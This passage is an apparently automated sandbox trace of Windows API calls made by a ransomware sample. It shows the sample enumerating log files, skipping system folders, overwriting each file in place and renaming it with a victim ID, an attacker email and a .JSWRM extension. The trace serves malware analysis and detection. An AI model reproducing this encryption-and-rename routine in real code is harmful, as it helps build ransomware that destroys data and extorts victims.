(lpFileName="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appxdeploymentserver%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0065.146] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=2166784) returned 1 [0065.146] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.146] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2471a8 [0065.146] ReadFile (in: hFile=0x450, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesRead=0x345f63c*=0x27100, lpOverlapped=0x0) returned 1 [0065.158] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.158] WriteFile (in: hFile=0x450, lpBuffer=0x2471a8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesWritten=0x345f638*=0x27100, lpOverlapped=0x0) returned 1 [0065.159] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0065.159] CloseHandle (hObject=0x450) returned 1 [0065.339] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0065.339] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0065.339] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8638 [0065.339] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8638, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0065.339] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0065.339] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8638 | out: hHeap=0x1e0000) returned 1 [0065.339] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0065.339] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0065.339] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0065.339] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0065.339] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x1f10b0 [0065.339] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0065.339] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f10b0 | out: hHeap=0x1e0000) returned 1 [0065.339] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x1ff448 [0065.339] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0065.339] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0065.339] MoveFileW (lpExistingFileName="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appxdeploymentserver%4operational.evtx"), lpNewFileName="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Operational.evtx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\logs\\microsoft-windows-appxdeploymentserver%4operational.evtx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0065.340] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0065.340] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0065.340] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0065.340] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0065.340] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e268 | out: hHeap=0x1e0000) returned 1 [0065.340] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5af3554f, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x5af3554f, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx", cAlternateFileName="MIDBEC~1.EVT")) returned 1 [0065.340] lstrcmpiW (lpString1="Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx", lpString2=".") returned 1 [0065.340] lstrcmpiW (lpString1="Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx", lpString2="..") returned 1 [0065.340] lstrcmpiW (lpString1="Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx", lpString2="...") returned 1 [0065.340] lstrcmpiW (lpString1="Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx", lpString2="windows") returned -1 [0065.340] lstrcmpiW (lpString1="Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx", lpString2="recovery") returned -1 [0065.340] lstrcmpiW (lpString1="Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx", lpString2="perflogs") returned -1 [0065.340] lstrcmpiW (lpString1="Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx", lpString2="documents and settings") returned 1 [0065.340] lstrcmpiW (lpString1="Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx", lpString2="$RECYCLE.BIN") returned 1 [0065.340] lstrcmpiW (lpString1="Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx", lpString2="system volume information") returned -1 [0065.340] lstrcmpiW (lpString1="Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx", lpString2="msocache") returned -1 [0065.340] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2091e8 [0065.340] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx", cchWideChar=55, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 55 [0065.340] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dec0 [0065.340] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx", cchWideChar=55, lpMultiByteStr=0x20dec0, cbMultiByte=55, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx", lpUsedDefaultChar=0x0) returned 55 [0065.340] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2091e8 | out: hHeap=0x1e0000) returned 1 [0065.340] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2095a8 [0065.341] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx", cchWideChar=55, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 55 [0065.341] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0065.341] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx", cchWideChar=55, lpMultiByteStr=0x20de78, cbMultiByte=55, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx", lpUsedDefaultChar=0x0) returned 55 [0065.341] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2095a8 | out: hHeap=0x1e0000) returned 1 [0065.341] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225190 [0065.341] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0065.341] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0065.341] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0065.341] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225548 [0065.341] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx" (normalized: "c:\\logs\\microsoft-windows-appxdeploymentserver%4restricted.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0065.342] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=69632) returned 1 [0065.342] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.342] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11000) returned 0x2471a8 [0065.342] ReadFile (in: hFile=0x450, lpBuffer=0x2471a8, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesRead=0x345f63c*=0x11000, lpOverlapped=0x0) returned 1 [0065.347] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.347] WriteFile (in: hFile=0x450, lpBuffer=0x2471a8*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2471a8*, lpNumberOfBytesWritten=0x345f638*=0x11000, lpOverlapped=0x0) returned 1 [0065.347] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471a8 | out: hHeap=0x1e0000) returned 1 [0065.348] CloseHandle (hObject=0x450) returned 1 [0065.349] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225878 [0065.349] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0065.349] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0065.349] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0065.349] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0065.349] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0065.349] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0065.349] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0065.349] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0065.349] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0065.349] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0065.350] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0065.350] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0065.350] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x1ff448 [0065.350] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0065.350] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0065.350] MoveFileW (lpExistingFileName="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx" (normalized: "c:\\logs\\microsoft-windows-appxdeploymentserver%4restricted.evtx"), lpNewFileName="C:\\Logs\\Microsoft-Windows-AppXDeploymentServer%4Restricted.evtx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\logs\\microsoft-windows-appxdeploymentserver%4restricted.evtx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0065.350] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0065.350] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225878 | out: hHeap=0x1e0000) returned 1 [0065.350] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0065.350] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0065.350] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dec0 | out: hHeap=0x1e0000) returned 1 [0065.350] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85798667, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x85798667, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-AppxPackaging%4Operational.evtx", cAlternateFileName="MI54F1~1.EVT")) returned 1 [0065.350] lstrcmpiW (lpString1="Microsoft-Windows-AppxPackaging%4Operational.evtx", lpString2=".") returned 1 [0065.350] lstrcmpiW (lpString1="Microsoft-Windows-AppxPackaging%4Operational.evtx", lpString2="..") returned 1 [0065.350] lstrcmpiW (lpString1="Microsoft-Windows-AppxPackaging%4Operational.evtx", lpString2="...") returned 1 [0065.350] lstrcmpiW (lpString1="Microsoft-Windows-AppxPackaging%4Operational.evtx", lpString2="windows") returned -1 [0065.350] lstrcmpiW (lpString1="Microsoft-Windows-AppxPackaging%4Operational.evtx", lpString2="recovery") returned -1 [0065.350] lstrcmpiW (lpString1="Microsoft-Windows-AppxPackaging%4Operational.evtx", lpString2="perflogs") returned -1 [0065.351] lstrcmpiW (lpString1="Microsoft-Windows-AppxPackaging%4Operational.evtx", lpString2="documents and settings") returned 1 [0065.351] lstrcmpiW (lpString1="Microsoft-Windows-AppxPackaging%4Operational.evtx", lpString2="$RECYCLE.BIN") returned 1 [0065.351] lstrcmpiW (lpString1="Microsoft-Windows-AppxPackaging%4Operational.evtx", lpString2="system volume information") returned -1 [0065.351] lstrcmpiW (lpString1="Microsoft-Windows-AppxPackaging%4Operational.evtx", lpString2="msocache") returned -1 [0065.351] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209440 [0065.351] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-AppxPackaging%4Operational.evtx", cchWideChar=49, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 49 [0065.351] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20de78 [0065.351] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-AppxPackaging%4Operational.evtx", cchWideChar=49, lpMultiByteStr=0x20de78, cbMultiByte=49, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-AppxPackaging%4Operational.evtx", lpUsedDefaultChar=0x0) returned 49 [0065.351] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209440 | out: hHeap=0x1e0000) returned 1 [0065.351] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209788 [0065.351] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-AppxPackaging%4Operational.evtx", cchWideChar=49, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 49 [0065.351] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20e418 [0065.351] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-AppxPackaging%4Operational.evtx", cchWideChar=49, lpMultiByteStr=0x20e418, cbMultiByte=49, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-AppxPackaging%4Operational.evtx", lpUsedDefaultChar=0x0) returned 49 [0065.351] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209788 | out: hHeap=0x1e0000) returned 1 [0065.351] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225658 [0065.351] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225190 | out: hHeap=0x1e0000) returned 1 [0065.351] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0065.351] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f69c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0065.351] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225878 [0065.351] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appxpackaging%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x450 [0065.351] GetFileSizeEx (in: hFile=0x450, lpFileSize=0x345f630 | out: lpFileSize=0x345f630*=69632) returned 1 [0065.351] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.351] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11000) returned 0x2481b0 [0065.351] ReadFile (in: hFile=0x450, lpBuffer=0x2481b0, nNumberOfBytesToRead=0x11000, lpNumberOfBytesRead=0x345f63c, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesRead=0x345f63c*=0x11000, lpOverlapped=0x0) returned 1 [0065.356] SetFilePointer (in: hFile=0x450, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0065.356] WriteFile (in: hFile=0x450, lpBuffer=0x2481b0*, nNumberOfBytesToWrite=0x11000, lpNumberOfBytesWritten=0x345f638, lpOverlapped=0x0 | out: lpBuffer=0x2481b0*, lpNumberOfBytesWritten=0x345f638*=0x11000, lpOverlapped=0x0) returned 1 [0065.357] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2481b0 | out: hHeap=0x1e0000) returned 1 [0065.357] CloseHandle (hObject=0x450) returned 1 [0065.359] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225108 [0065.359] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0065.359] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0065.359] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0065.359] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0065.359] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0065.359] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0065.359] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0065.359] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0065.359] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0065.359] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224bb8 [0065.359] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0065.359] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224bb8 | out: hHeap=0x1e0000) returned 1 [0065.359] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23f158 [0065.359] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0065.359] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0065.359] MoveFileW (lpExistingFileName="C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-appxpackaging%4operational.evtx"), lpNewFileName="C:\\Logs\\Microsoft-Windows-AppxPackaging%4Operational.evtx.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\logs\\microsoft-windows-appxpackaging%4operational.evtx.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0065.360] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f158 | out: hHeap=0x1e0000) returned 1 [0065.360] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225108 | out: hHeap=0x1e0000) returned 1 [0065.360] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225878 | out: hHeap=0x1e0000) returned 1 [0065.360] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e418 | out: hHeap=0x1e0000) returned 1 [0065.360] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20de78 | out: hHeap=0x1e0000) returned 1 [0065.360] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd74d25ab, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xd74d25ab, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xa1df92a8, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx", cAlternateFileName="MI111F~1.EVT")) returned 1 [0065.360] lstrcmpiW (lpString1="Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx", lpString2=".") returned 1 [0065.360] lstrcmpiW (lpString1="Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx", lpString2="..") returned 1 [0065.360] lstrcmpiW (lpString1="Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx", lpString2="...") returned 1 [0065.360] lstrcmpiW (lpString1="Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx", lpString2="windows") returned -1 [0065.360] lstrcmpiW (lpString1="Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx", lpString2="recovery") returned -1 [0065.360] lstrcmpiW (lpString1="Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx", lpString2="perflogs") returned -1 [0065.360] lstrcmpiW (lpString1="Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx", lpString2="documents and settings") returned 1 [0065.360] lstrcmpiW (lpString1="Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx", lpString2="$RECYCLE.BIN") returned 1 [0065.360] lstrcmpiW (lpString1="Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx", lpString2="system volume information") returned -1 [0065.360] lstrcmpiW (lpString1="Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx", lpString2="msocache") returned -1 [0065.360] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0065.360] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx", cchWideChar=64, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 64 [0065.360] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c380 [0065.360] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx", cchWideChar=64, lpMultiByteStr=0x22c380, cbMultiByte=64, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx", lpUsedDefaultChar=0x0) returned 64 [0065.360] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0065.360] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0065.360] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx", cchWideChar=64, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 64 